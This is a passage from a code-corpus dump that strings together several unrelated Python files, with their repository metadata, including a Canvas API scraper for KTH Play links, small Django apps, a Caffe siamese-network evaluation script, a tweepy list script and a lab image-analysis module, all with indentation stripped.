if t.find("//play.kth.se") >= 0:
set_of_unique_URLs.add(t)
return set_of_unique_URLs
def compute_stats_for_pages_in_course(course_id):
list_of_all_pages=[]
page_stats=[]
# Use the Canvas API to get the list of pages for this course
#GET /api/v1/courses/:course_id/pages
url = baseUrl + '%s/pages' % (course_id)
if Verbose_Flag:
print("url: " + url)
r = requests.get(url, headers = header)
if Verbose_Flag:
write_to_log("result of getting pages: " + r.text)
if r.status_code == requests.codes.ok:
page_response=r.json()
else:
print("No pages for course_id: {}".format(course_id))
return False
for p_response in page_response:
list_of_all_pages.append(p_response)
# the following is needed when the reponse has been paginated
# i.e., when the response is split into pieces - each returning only some of the list of modules
# see "Handling Pagination" - Discussion created by tyler.clair@usu.edu on Apr 27, 2015, https://community.canvaslms.com/thread/1500
while r.links['current']['url'] != r.links['last']['url']:
r = requests.get(r.links['next']['url'], headers=header)
page_response = r.json()
for p_response in page_response:
list_of_all_pages.append(p_response)
for p in list_of_all_pages:
# make a new list of links for each page
raw_links = set()
print("{}".format(p["title"]))
# Use the Canvas API to GET the page
#GET /api/v1/courses/:course_id/pages/:url
url = baseUrl + '%s/pages/%s' % (course_id, p["url"])
if Verbose_Flag:
print(url)
payload={}
r = requests.get(url, headers = header, data=payload)
if r.status_code == requests.codes.ok:
page_response = r.json()
if Verbose_Flag:
print("body: {}".format(page_response["body"]))
try:
document = html.document_fromstring(page_response["body"])
#raw_text = document.text_content()
for link in document.xpath('//a/@href'):
if Verbose_Flag:
print("link: {}".format(link))
raw_links.add(link)
except ValueError:
# if there is code on the page, for example a json structure, then the hyphenation package cannot handle this
if Verbose_Flag:
print("there is likely code on page {}".format(url))
continue
if Verbose_Flag:
print("raw_links: {}".format(raw_links))
else:
print("No pages for course_id: {}".format(course_id))
return False
# see http://www.erinhengel.com/software/textatistic/
try:
fixed_title=page_response["title"].replace(',', '_comma_')
fixed_title=fixed_title.replace('"', '_doublequote_')
fixed_title=fixed_title.replace("'", '_singlequote_')
page_entry={"url": url, "page_name": fixed_title, "unique URLs": unique_KTH_Play_URLs(raw_links)}
except ZeroDivisionError:
# if there are zero sentences, then some of the scores cannot be computed
if Verbose_Flag:
print("no sentences in page {}".format(url))
continue
except ValueError:
# if there is code on the page, for example a json structure, then the hyphenation package cannot handle this
if Verbose_Flag:
print("there is likely code on page {}".format(url))
continue
if page_entry:
page_stats.append(page_entry)
return page_stats
def get_course_syllabus(course_id):
page_stats=[]
# make a new list of links
raw_links = set()
# Use the Canvas API to get the list of pages for this course
#GET /api/v1/courses/:course_id?include[]=syllabus_body
url = baseUrl + '%s' % (course_id)
if Verbose_Flag:
print("url: " + url)
extra_parameters={'include[]': 'syllabus_body'}
r = requests.get(url, params=extra_parameters, headers = header)
if Verbose_Flag:
write_to_log("result of getting syllabus: " + r.text)
if r.status_code == requests.codes.ok:
page_response=r.json()
if Verbose_Flag:
print("body: {}".format(page_response["syllabus_body"]))
if len(page_response["syllabus_body"]) == 0:
return []
try:
document = html.document_fromstring(page_response["syllabus_body"])
#raw_text = document.text_content()
for link in document.xpath('//a/@href'):
if Verbose_Flag:
print("link: {}".format(link))
raw_links.add(link)
except ValueError:
# if there is code on the page, for example a json structure, then the hyphenation package cannot handle this
if Verbose_Flag:
print("there is likely code on page {}".format(url))
else:
print("No syllabus for course_id: {}".format(course_id))
return False
# see http://www.erinhengel.com/software/textatistic/
try:
fixed_title='Syllabus'
page_entry={"url": url, "page_name": fixed_title, "unique URLs": unique_KTH_Play_URLs(raw_links)}
except ZeroDivisionError:
# if there are zero sentences, then some of the scores cannot be computed
if Verbose_Flag:
print("no sentences in page {}".format(url))
except ValueError:
# if there is code on the page, for example a json structure, then the hyphenation package cannot handle this
if Verbose_Flag:
print("there is likely code on page {}".format(url))
if page_entry:
page_stats.append(page_entry)
return page_stats
def list_pages(course_id):
list_of_all_pages=[]
# Use the Canvas API to get the list of pages for this course
#GET /api/v1/courses/:course_id/pages
url = baseUrl + '%s/pages' % (course_id)
if Verbose_Flag:
print("url: " + url)
r = requests.get(url, headers = header)
if Verbose_Flag:
write_to_log("result of getting pages: " + r.text)
if r.status_code == requests.codes.ok:
page_response=r.json()
for p_response in page_response:
list_of_all_pages.append(p_response)
# the following is needed when the reponse has been paginated
# i.e., when the response is split into pieces - each returning only some of the list of modules
# see "Handling Pagination" - Discussion created by tyler.clair@usu.edu on Apr 27, 2015, https://community.canvaslms.com/thread/1500
while r.links['current']['url'] != r.links['last']['url']:
r = requests.get(r.links['next']['url'], headers=header)
page_response = r.json()
for p_response in page_response:
list_of_all_pages.append(p_response)
for p in list_of_all_pages:
print("{}".format(p["title"]))
def get_assignments(course_id):
assignments_found_thus_far=[]
page_stats=[]
# make a new list of links
raw_links = set()
# Use the Canvas API to get the list of assignments for the course
#GET /api/v1/courses/:course_id/assignments
url = baseUrl + '%s/assignments' % (course_id)
if Verbose_Flag:
print("url: " + url)
r = requests.get(url, headers = header)
if Verbose_Flag:
write_to_log("result of getting assignments: " + r.text)
if r.status_code == requests.codes.ok:
page_response=r.json()
for p_response in page_response:
assignments_found_thus_far.append(p_response)
# the following is needed when the reponse has been paginated
# i.e., when the response is split into pieces - each returning only some of the list of modules
# see "Handling Pagination" - Discussion created by tyler.clair@usu.edu on Apr 27, 2015, https://community.canvaslms.com/thread/1500
while r.links['current']['url'] != r.links['last']['url']:
r = requests.get(r.links['next']['url'], headers=header)
page_response = r.json()
for p_response in page_response:
assignments_found_thus_far.append(p_response)
for a in assignments_found_thus_far:
# make a new list of links for each assignment
raw_links = set()
print("{}".format(a["name"]))
url = a["html_url"]
if Verbose_Flag:
print(url)
if Verbose_Flag:
print("description: {}".format(a["description"]))
try:
document = html.document_fromstring(a["description"])
#raw_text = document.text_content()
for link in document.xpath('//a/@href'):
if Verbose_Flag:
print("link: {}".format(link))
raw_links.add(link)
except ValueError:
# if there is code on the page, for example a json structure, then the hyphenation package cannot handle this
if Verbose_Flag:
print("there is likely code on page {}".format(url))
continue
# see http://www.erinhengel.com/software/textatistic/
try:
fixed_title=a["name"].replace(',', '_comma_')
fixed_title=fixed_title.replace('"', '_doublequote_')
fixed_title=fixed_title.replace("'", '_singlequote_')
page_entry={"url": url, "page_name": fixed_title, "unique URLs": unique_KTH_Play_URLs(raw_links)}
except ZeroDivisionError:
# if there are zero sentences, then some of the scores cannot be computed
if Verbose_Flag:
print("no sentences in assignment {}".format(url))
continue
except ValueError:
# if there is code on the page, for example a json structure, then the hyphenation package cannot handle this
if Verbose_Flag:
print("there is likely code on page {}".format(url))
continue
if page_entry:
page_stats.append(page_entry)
return page_stats
def main():
global Verbose_Flag
parser = optparse.OptionParser()
parser.add_option('-v', '--verbose',
dest="verbose",
default=False,
action="store_true",
help="Print lots of output to stdout"
)
options, remainder = parser.parse_args()
Verbose_Flag=options.verbose
if Verbose_Flag:
print('ARGV :', sys.argv[1:])
print('VERBOSE :', options.verbose)
print('REMAINING :', remainder)
# add time stamp to log file
log_time = str(time.asctime(time.localtime(time.time())))
if Verbose_Flag:
write_to_log(log_time)
if (len(remainder) < 1):
print("Inusffient arguments\n must provide course_id\n")
else:
course_id=remainder[0]
output=compute_stats_for_pages_in_course(course_id)
if Verbose_Flag:
print("output: {}".format(output))
output2=get_course_syllabus(course_id)
if Verbose_Flag:
print("output2: {}".format(output2))
for i in output2:
output.append(i)
if Verbose_Flag:
print("output following syllabus processing: {}".format(output))
output3=get_assignments(course_id)
if Verbose_Flag:
print("output3: {}".format(output3))
for i in output3:
output.append(i)
if Verbose_Flag:
print("output following assignment processing: {}".format(output))
if (output):
if Verbose_Flag:
print(output)
with open('KTHplay_URLs_for_course_'+course_id+'.csv', "wb") as writer:
spreadsheet_headings = ['url', 'page_name', 'unique URLs']
for heading in spreadsheet_headings:
encoded_output =bytes((heading + ","), 'UTF-8')
writer.write(encoded_output)
writer.write(bytes(u'\n', 'UTF-8'))
for item in output:
out_row = [item['url'], item['page_name'], item['unique URLs']]
for v in out_row:
if type(v) is str:
encoded_output = bytes((v + ","), 'UTF-8')
else:
encoded_output = bytes((str(v) + ","), 'UTF-8')
writer.write(encoded_output)
writer.write(bytes(u'\n', 'UTF-8'))
writer.close()
# add time stamp to log file
log_time = str(time.asctime(time.localtime(time.time())))
if Verbose_Flag:
write_to_log(log_time)
write_to_log("\n--DONE--\n\n")
if __name__ == "__main__": main()
| [
"shivabp@icloud.com"
] | shivabp@icloud.com |
00967f74adf86ff5e01d221fc7f5261c3c393ca7 | caf246497410866e0f9896c2e51d790518c63f35 | /PythonClient.py | ef5ce956f11a4f5df93a48281d3ffcc8a86bbc21 | [] | no_license | StevenLdh/PythonStudyOne | e979231cbf6fd5a433b86f4b409cfa71b5d8e4b2 | 0f98aa1d478d46c55b2d5cf9af5f6b6fe27f4bcf | refs/heads/master | 2020-04-02T17:40:11.754086 | 2019-05-20T06:11:34 | 2019-05-20T06:11:34 | 154,666,795 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | #!/usr/bin/python3
# ๆไปถๅ๏ผclient.py
# ๅฏผๅ
ฅ socketใsys ๆจกๅ
import socket
import sys
# ๅๅปบ socket ๅฏน่ฑก
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# ่ทๅๆฌๅฐไธปๆบๅ
host = socket.gethostname()
# ่ฎพ็ฝฎ็ซฏๅฃๅท
port = 9999
# ่ฟๆฅๆๅก๏ผๆๅฎไธปๆบๅ็ซฏๅฃ
s.connect((host, port))
# ๆฅๆถๅฐไบ 1024 ๅญ่็ๆฐๆฎ
msg = s.recv(1024)
s.close()
print(msg.decode('utf-8')) | [
"lidehuawork@163.com"
] | lidehuawork@163.com |
a5e3a44b8d8c91cfa90e5ee8271bd1d34fba668b | f479e33c9e591f2de3855d2aa58815ffd1ca2756 | /Alien/setting.py | 67ba8cc56dc187953756d8ee622da5a2d4820d8b | [] | no_license | cathip/mixed | 2f8ab69d2268ba9fd38ed3e2c25d7bfea4cbe881 | 66fb3be4fe208c3c66dabfd3352c0dc348eaef52 | refs/heads/master | 2022-12-02T08:10:17.108904 | 2020-07-23T13:16:25 | 2020-07-23T13:16:25 | 281,955,265 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 629 | py | class Setting():
def __init__(self):
self.screen_width = 1200
self.screen_height = 800
self.bg_color = (230, 230, 230)
#้ฃ่น็่ฎพ็ฝฎ
self.ship_speed_factor = 1.5
self.ship_limit = 3
#ๅญๅผน่ฎพ็ฝฎ
self.bullet_speed_factor = 3
self.bullet_width = 10
self.bullet_height = 30
self.bullet_color = 245, 192, 10
self.bullet_allowed = 30
#ๅคๆไบบ่ฎพ็ฝฎ
self.alien_speed_factor = 1
self.fleet_drop_speed = 50
#fleet_direction 1่กจ็คบๅณ็งป -1่กจ็คบๅทฆ็งป
self.fleet_direction = 1 | [
"862485926@qq.com"
] | 862485926@qq.com |
dbddebd411deb095d4dc5db535becd6c81fe2c76 | ae69970610b5a3c253a8fd7e595ef67c31ba3c36 | /Scouter/wsgi.py | 821fdd7d61afd5534a16039dc85ae4955c586147 | [
"MIT"
] | permissive | DevrathIyer/FRCScouter2017-2018 | 40bf00c69746e2368ef980ace4eb32c7e55d94ee | 64c76b570d4b9bf82ed00f8d7cd6865e383b26d6 | refs/heads/master | 2021-01-11T13:57:07.168053 | 2017-06-20T16:30:00 | 2017-06-20T16:30:00 | 94,910,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | """
WSGI config for Scouter project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "Scouter.settings")
application = get_wsgi_application()
| [
"idevrath@gmail.com"
] | idevrath@gmail.com |
0b1088393f030a8a3fffe2f5092bad8231fac47c | a8e90365bb80918d1b03a0269aff9fb69d52d250 | /9.Function-Lambda.py | a8537b6999bb2e9d2f706c4fd92bbb976e7a21f7 | [] | no_license | sanghoon96/learn_python | af929ddec3d22a4c8c70a5d0bbde79763e0ab314 | 1bc43cbf9f365120a8d44c677514d2b63974b471 | refs/heads/master | 2023-02-04T20:32:29.773049 | 2020-12-07T23:35:37 | 2020-12-07T23:35:37 | 318,410,736 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 298 | py | sum = lambda arg1, arg2 : arg1 + arg2;
print("Value of total : ", sum( 10, 20 ))
nums = [1,2,3]
def is_greater_than_one(x):
return x > 1
more_than_nums = filter(is_greater_than_one, nums)
print(list(more_than_nums))
more_than_nums = filter(lambda x : x > 1, nums)
print(list(more_than_nums)) | [
"sanghoon96@naver.com"
] | sanghoon96@naver.com |
d77736ddb7296765054ab14e0be64df5ce79366e | 844ba7f7cde8730255487a0063535dfc81343715 | /pharmacyProject/wsgi.py | 5e528e121836ab30b941f09c888206e79ba22ad0 | [] | no_license | pharmacyProjectInDjango/pharmacyProject | 60ddebc3be2ee02c3ce806a2c31c4af8e09c551c | c087c6f52f8f37b9fa522d69a8bce26a51284154 | refs/heads/master | 2023-06-03T11:57:12.897145 | 2021-06-10T18:18:13 | 2021-06-10T18:18:13 | 375,784,738 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | """
WSGI config for pharmacyProject project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pharmacyProject.settings')
application = get_wsgi_application()
| [
"almazikay@gmail.com"
] | almazikay@gmail.com |
74b0a2c23703cb4e5ab03f2b4f26df4d4bbbd55f | c705b2620119df0d60e925e55228bfbb5de3f568 | /archives/twitter/add_to_list.py | b07b820c711aef611ff33b5d19f9e517e8424b05 | [
"Apache-2.0"
] | permissive | mcxiaoke/python-labs | 5aa63ce90de5da56d59ca2954f6b3aeae7833559 | 61c0a1f91008ba82fc2f5a5deb19e60aec9df960 | refs/heads/master | 2021-08-05T03:47:51.844979 | 2021-07-24T11:06:13 | 2021-07-24T11:06:13 | 21,690,171 | 7 | 7 | Apache-2.0 | 2020-08-07T01:52:32 | 2014-07-10T10:20:17 | Python | UTF-8 | Python | false | false | 1,023 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: mcxiaoke
# @Date: 2016-01-04 14:39:15
from __future__ import print_function, unicode_literals
import os
import sys
import codecs
import requests
import tweepy
from config import OWNER, OWNER_ID, CONSUMER_KEY, CONSUMER_SECRET, ACCESSS_TOKEN_KEY, ACCESS_TOKEN_SECRET
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESSS_TOKEN_KEY, ACCESS_TOKEN_SECRET)
api = tweepy.API(auth)
def read_list(name):
if not os.path.isfile(name):
return None
with codecs.open(name, 'r', 'utf-8') as f:
return [line.rstrip('\n') for line in f]
def add_to_list(slug, screen_name):
print('add user: %s to list: %s' % (screen_name, slug))
api.add_list_member(slug=slug,
screen_name=screen_name,
owner_screen_name='dorauimi')
def main():
uids = read_list(sys.argv[1])
for uid in uids:
add_to_list('asiangirls', uid)
if __name__ == '__main__':
main()
| [
"mcxiaoke@gmail.com"
] | mcxiaoke@gmail.com |
ee93c3fd7fdf2625001431b69199e534a918d3fc | f586ce9f6a91ea1b42449325be38596b891fa503 | /song.py | 9d37e2bb2db9e30ad05c840b76ee5029b95d3874 | [] | no_license | LukeEsworthy/Setlist-Tracker | 00976041250f83facd383b6cc7e4cc39fb0b64ef | 6fa7da5a788d90e7bdc3ad342f93fff8c9efa5f6 | refs/heads/master | 2022-12-13T03:23:27.230780 | 2020-09-14T20:46:41 | 2020-09-14T20:46:41 | 294,788,469 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | from django.db import models
class Song(models.Model):
title = models.CharField(max_length=75)
artist = models.CharField(max_length=75)
song_length = models.IntegerField()
def __str__(self):
return f'{self.title} by {self.artist}'
| [
"lukesworthy@gmail.com"
] | lukesworthy@gmail.com |
aba0382b93e31c197307a735fec8fa49db618b0e | 7a4be09397ebb9cd5329675adf687ff845c0404a | /code/caffe/gen_feature.py | 757eb7507e6c5656d69f3a37d66f931816f92d5f | [
"MIT"
] | permissive | zhaokv/Deep-Style-Match | 79cbe4be8b030fb03af6fb4253c76090e1cc8da6 | ea44c9dcde387fd280be1a05341dc63e7df23644 | refs/heads/master | 2021-05-19T09:28:53.456879 | 2020-03-31T14:40:03 | 2020-03-31T14:40:03 | 251,630,415 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,635 | py | import sys
caffeRoot = '/home/zhaokui/code/caffe/'
sys.path.insert(0, caffeRoot+'python')
import caffe
import numpy as np
import cPickle as pickle
import copy
from sklearn.metrics.pairwise import euclidean_distances as ed
from sklearn.metrics import roc_auc_score as auc
from tqdm import *
modelDir = '/home/zhaokui/research/KDD/code/caffe/siamese_googlenet/'
caffe.set_mode_gpu()
net = caffe.Classifier(modelDir+'deploy1.prototxt',
modelDir+'googlenet_iter_60000.caffemodel',
(256, 256),
np.load('item_mean.npy').mean(1).mean(1),
None,
224,
(2,1,0))
itemDir = '/home/zhaokui/research/KDD/data/taobao/'
itemData = open(itemDir+'pro_test_item.txt').readlines()
featureDic = {}
for item in tqdm(itemData):
name = item.split('/')[1].split('.')[0]
image = caffe.io.load_image(itemDir+item.split()[0])
net.predict([image], False)
featureDic[name] = copy.deepcopy(net.blobs['loss3f'].data[0])
y = []
pred_y = []
dataDir = '/home/zhaokui/research/KDD/data/taobao/'
testData = open(dataDir+'pro_test_set.txt').readlines()
for line in tqdm(testData):
tmp = line.split()
itemA = tmp[0].split('/')[1].split('.')[0]
itemB = tmp[1].split('/')[1].split('.')[0]
y.append(int(tmp[2]))
pred_y.append(ed(np.array(featureDic[itemA]).reshape(1,-1),
np.array(featureDic[itemB]).reshape(1, -1))[0][0])
with open('predict.dat', 'w') as f:
pickle.dump((y, pred_y), f)
with open('item_feature.dat', 'w') as f:
pickle.dump(featureDic, f)
print(auc(y, pred_y))
| [
"zhaokui@zju.edu.cn"
] | zhaokui@zju.edu.cn |
7cc84142786ae723ed0b34d062969d89df876df0 | a9d482fea671e1a8bede36978ea2cf6406bf519c | /apps/accounts/views.py | 0bd42648f3c0f567a2881f74004045c7c517e7c4 | [] | no_license | aigora-de/aigora-web-old | 5d1873e26292419b6c7537e059d454a0f335308b | 6c2b3ba98337bb540992afe2b936edd717b8900c | refs/heads/master | 2020-06-19T21:41:52.730050 | 2019-07-17T06:23:26 | 2019-07-17T06:23:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | from django.contrib.auth.forms import UserCreationForm
from django.urls import reverse_lazy
from django.views import generic
# Create your views here.
class SignUp(generic.CreateView):
form_class = UserCreationForm
success_url = reverse_lazy('login')
template_name = 'signup.html'
| [
"40235800+See2-io@users.noreply.github.com"
] | 40235800+See2-io@users.noreply.github.com |
6170065e53c3bee0a39dd471835021b9a8d4e23e | 0c9236c0ac3fb3b1a681bbdf50836a9d94f750a7 | /im_analysis.py | d2963fb363263134ccf460438aa67f6644b1482b | [] | no_license | chchamb/EXOscripts | 536d823e06ce73015b411a483560d9baece2b660 | dad1aad4321c55cfdc5564408b510dd159f914ae | refs/heads/master | 2021-01-01T16:59:32.191646 | 2017-07-21T17:29:13 | 2017-07-21T17:29:13 | 97,971,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 69,733 | py | # Script for handling image analysis
import numpy as np
import matplotlib.pyplot as plt
import utility as ut
import gen_reader as gr
import lv_analysis as lv
import scope_cal as scp
import funk
import math as m
# Define global variable for date and darkfile
date=20170720
darkfiles=gr.reader('/home/chris/anaconda/EXOscripts/darkframes.txt',header=False,dtype=int)
nullpulses=gr.reader('/home/chris/anaconda/EXOscripts/nullpulses.txt',header=False,dtype=int)
darkfile=int(darkfiles[np.where(darkfiles==date)[0],1])
if date in nullpulses[:,0]:
null_pulse=int(nullpulses[np.where(nullpulses==date)[0],1])
#=========================================================================================
# Function to remove cosmic rays from images
def im_remove_cosmics_old(filenum,tag,output):
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import os
import utility as ut
# Import file to be read and it's information
expnum=os.listdir('/home/chris/anaconda/data/'+str(date)+'/raw/ascii')[1][:7]
filename='/home/chris/anaconda/data/'+str(date)+'/raw/ascii/'+expnum+str(filenum)+'.txt'
datafile= open(filename,'r')
# Get run number from data file name
run=''
j=1 # j is the incrementor for characters in the run name/number
for i in range(1,len(filename)+1):
if filename[-i]=='/': # Steps backwards in path until it finds a '/'
while filename[-i+j]!='.':
run += filename[-i+j] # Adds on characters after the '/' until it finds a '.'
j+=1
break
else:
continue
# Initialize list for unorganized data. Going to make one long list of floats
# corresponding to the pixel values (i.e. column 4 of the datafile)
column1=[]
column2=[]
column4=[]
for line in datafile:
line=line.strip()
values=line.split()
column1.append(float(values[0]))
column4.append(float(values[3]))
y_max=int(values[1])
N= int(values[2])
# Close the datafile, what were you, raised in MATLAB?
datafile.close()
# Get the number of x and y points and the arrays for each (usually 1340 x 400, but could change)
x_max= int(len(column1)/(N*y_max))
x=np.array(range(x_max))
y=range(1,y_max+1)
# Organize data into a list of lists of lists (frame,y,x).
pix=[]
# Big loop makes a list of the frame sub lists
for i in range(N):
frame_pix=[]
# Small loop makes a list of the row sub lists
for j in range(y_max*i,y_max*(i+1)):
# This grabs a chunk of length x_max from the unorganized list (one row of pixels)
frame_pix.append(column4[x_max*(j):x_max*(j+1)])
pix.append(frame_pix)
# Make copy array for removal of cosmics
pix_raw=np.array(pix)
pix_cf=np.array(pix)
# Remove Cosmic Rays
for k in range(N):
reps= 0
rep_waves=[]
for j in range(y_max):
if j<=2:
continue
if j>= (y_max-3):
continue
else:
for i in range(x_max):
if i <= 2:
continue
if i >= (x_max-3):
continue
else:
bin= np.ndarray.flatten(pix_raw[k,j-2:j+3,i-2:i+3])
bin=np.delete(bin,7)
bin_ave= np.mean(bin)
if pix_raw[k,j,i]>=(3*bin_ave):
rep_vals= np.concatenate([bin,[bin_ave]])
pix_cf[k,j,i-1:i+2]= np.amin(rep_vals)
reps= reps+1
rep_waves.append([round(x[i],2),round(y[j+1],2)])
if reps > 0 and output==True:
print('Cosmics removed from frame %d'%(k+1))
return x,y,pix_cf,x_max,y_max,N,run
#-----------------------------------------------------------------------------------------
# Create dark frame average:
if darkfile!=0:
dark_pix_g=np.mean(im_remove_cosmics_old(darkfile,'bg',False)[2],axis=0)
#print(np.mean(dark_pix_g))
print('dark run: '+str(darkfile))
if darkfile==0:
dark_pix_g=0.
#------------------------------------------------------------------------------------------
# Function to import data from ascii files
def im_import(filenum,tag,output):
# Import modules for array and plotting
import numpy as np
import os
import pandas as pd
# Import file to be read and it's information
expnum=os.listdir('/home/chris/anaconda/data/'+str(date)+'/raw/ascii')[1][:7]
filename='/home/chris/anaconda/data/'+str(date)+'/raw/ascii/'+expnum+str(filenum)+'.txt'
# Get run number from data file name
run=''
j=1 # j is the incrementor for characters in the run name/number
for i in range(1,len(filename)+1):
if filename[-i]=='/': # Steps backwards in path until it finds a '/'
while filename[-i+j]!='.':
run += filename[-i+j] # Adds on characters after the '/' until it finds a '.'
j+=1
break
else:
continue
# Import data using pandas
dat=pd.read_csv(filename,header=None,sep=' ')
dat.columns=['x','y','f','px']
# Reshape into [f,y,x] ndarray
y_max,N=np.amax(dat.y),np.amax(dat.f)
x_max=int(len(dat.px)/(y_max*N))
x,y=np.arange(x_max),np.arange(y_max)
pix=np.reshape(dat.px,(N,y_max,x_max))
return x,y,pix,x_max,y_max,N,run
#-----------------------------------------------------------------------------------------
# Function to background subtract images
def im_sub(sigfile,bgfile,**kwargs):
# Define keyword arguments
scale=kwargs.get('bg_scale',1.)
shift=kwargs.get('bg_shift',[0,0])
frame=kwargs.get('bg_frame','ave')
sigframe=kwargs.get('frames','all')
import numpy as np
import utility as ut
# Import data and remove cosmics for signal and background with image_remove_cosmics
sig_x,sig_y,sig_pix,sig_x_max,sig_y_max,sig_N,sig_run=im_sub_dark(sigfile)
bg_x,bg_y,bg_pix,bg_x_max,bg_y_max,bg_N,bg_run=im_sub_dark(bgfile)
if sigframe!= 'all':
sig_pix=sig_pix[sigframe,:,:]
sig_N=len(sigframe)
if frame=='ave':
# Average the background frames together
bg_pix=np.mean(bg_pix,axis=0)
if frame=='each':
bg_pix=bg_pix
else:
# Choose the frame to sub
bg_pix=bg_pix[frame-1,:,:]
# Shift if necessary
bg_final=ut.shifter(bg_pix,shift[0],shift[1])
# Do the subtraction
pix_sub=sig_pix-(scale*bg_final)
return sig_x,sig_y,pix_sub,sig_x_max,sig_y_max,sig_N,sig_run
#-----------------------------------------------------------------------------------------
# Function to background subtract images
def im_sub_dark(sigfile,speed,**kwargs):
dark=kwargs.get('dark',False)
import numpy as np
import utility as ut
# Import data and remove cosmics for signal and background with image_remove_cosmics
sig_x,sig_y,sig_pix,sig_x_max,sig_y_max,sig_N,sig_run=im_import(sigfile,'signal',False)
if speed=='slow':
if dark==0.:
dark_pix=np.zeros(np.shape(sig_pix))
dark_pix[:,:]=0.
if dark==False:
dark_pix=dark_pix_g
if dark not in [False,0.]:
dark_x,dark_y,dark_pix,dark_x_max,dark_y_max,dark_N,dark_run=im_remove_cosmics_old(dark,'background',False)
dark_pix=np.mean(dark_pix,axis=0)
print('manual dark frame: '+str(dark))
if speed=='fast':
sig_pix=sig_pix[:,:,2:]
dark_pix=np.zeros(np.shape(sig_pix))
# Do the subtraction
pix_sub=[]
for i in range(sig_N):
pix_sub.append(sig_pix[i,:,:]-dark_pix)
pix_sub=np.array(pix_sub)
if dark==0:
pix_sub=sig_pix
return sig_x,sig_y,pix_sub,sig_x_max,sig_y_max,sig_N,sig_run
#-----------------------------------------------------------------------------------------
# Function to plot 0th order images
def implot_0(filename,**kwargs):
# Define keyword arguments
colmap=kwargs.get('cmap','jet')
frames=kwargs.get('frames','all')
bgfile=kwargs.get('bgfile',False)
store=kwargs.get('store',False)
savepath=kwargs.get('savepath',False)
xylim=kwargs.get('axis','default')
zscale=kwargs.get('z_scale','default')
tag=kwargs.get('tag','')
bgscale=kwargs.get('bg_scale',1.)
shift=kwargs.get('bg_shift',[0,0])
bgframe=kwargs.get('bg_frame','ave')
overlay=kwargs.get('overlay',False)
rect=kwargs.get('rect','none')
lvscale=kwargs.get('lv',False)
speed=kwargs.get('speed','slow')
scale=kwargs.get('scale',1.)
dark=kwargs.get('dark',False)
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import os
import utility as ut
import lv_analysis as lv
if bgfile==False:
# Import data and remove cosmics with image_remove_cosmics
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed,dark=dark)
else:
# Import data and remove cosmics with image_sub
if frames!='all':
frames=np.array(frames)-1
x,y,pix,x_max,y_max,N,run=im_sub(filename,bgfile,bg_scale=bgscale,bg_shift=shift,bg_frame=bgframe,frames=frames)
if frames=='all':
frames=range(1,N+1)
# Scale, if neccesary
pix=pix*scale
if lvscale!=False:
pows=lv.lv_energy(lvscale)*1000
pix=pix/pows
# Plot the frames desired
if frames != 'none':
for frame in frames:
if overlay==False:
plt.figure(run)
if overlay==True:
plt.figure('im_plot')
plt.clf()
im=plt.imshow(pix[(frame-1),:,:],cmap=colmap,interpolation='nearest')
plt.colorbar(im,orientation='vertical')
plt.title(run+': frame '+repr(frame))
plt.xlabel('x Pixel')
plt.ylabel('y Pixel')
# want to start at beginning of first lim, and end of last lim
plt.axis([x[0]-.5,x[-1]-.5,y[0]-.5,y[-1]-.5])
if xylim!='default':
plt.axis(xylim)
if zscale!='default':
plt.clim(zscale)
if rect!='none':
ut.rect(rect)
plt.show()
if savepath!=False:
ut.create_dir(savepath)
if frame<=9:
framestr='00'+str(frame)
if 10<=frame<=99:
framestr='0'+str(frame)
if 100<=frame:
framestr=str(frame)
plt.savefig(savepath+'/'+str(date)+'_run'+str(filename)+'_'+framestr+tag+'.png')
# Return data if desired
if store==True:
return pix
#-----------------------------------------------------------------------------------------
# Function to plot 0th order images
def im_read(filename,**kwargs):
# Define keyword arguments
bgfile=kwargs.get('bgfile',False)
bgscale=kwargs.get('bg_scale',1.)
shift=kwargs.get('bg_shift',[0,0])
bgframe=kwargs.get('bg_frame','ave')
lvscale=kwargs.get('lv',False)
speed=kwargs.get('speed','slow')
scale=kwargs.get('scale',1.)
dark=kwargs.get('dark',False)
T_R=kwargs.get('T_R',1.)
# Import modules for array and plotting
import numpy as np
import matplotlib.pyplot as plt
import os
import utility as ut
import lv_analysis as lv
if bgfile==False:
# Import data and remove cosmics with image_remove_cosmics
x,y,pix,x_max,y_max,N,run=im_sub_dark(filename,speed,dark=dark)
else:
# Import data and remove cosmics with image_sub
if frames!='all':
frames=np.array(frames)-1
x,y,pix,x_max,y_max,N,run=im_sub(filename,bgfile,bg_scale=bgscale,bg_shift=shift,bg_frame=bgframe,frames='all')
# Scale, if neccesary
pix=pix*scale
if lvscale!=False:
pows=lv.lv_pow(lvscale,T_R=T_R)*1000
for i in range(len(pows)):
pix[i,:,:]=pix[i,:,:]/pows[i]
return pix
#-----------------------------------------------------------------------------------------
# Function to integrate area in 0-order image (can do fractional pixels)
def im_int(filename,bounds,**kwargs):
# Define keyword arguments
colmap=kwargs.get('cmap','jet')
frames=kwargs.get('frames','all')
bgfile=kwargs.get('bgfile',False)
plt_rect=kwargs.get('plt_rect',True)
savepath=kwargs.get('savepath',False)
store=kwargs.get('store',True)
overlay=kwargs.get('overlay',False)
lab=kwargs.get('label','default')
scale=kwargs.get('bg_scale',1.)
shift=kwargs.get('bg_shift',[0,0])
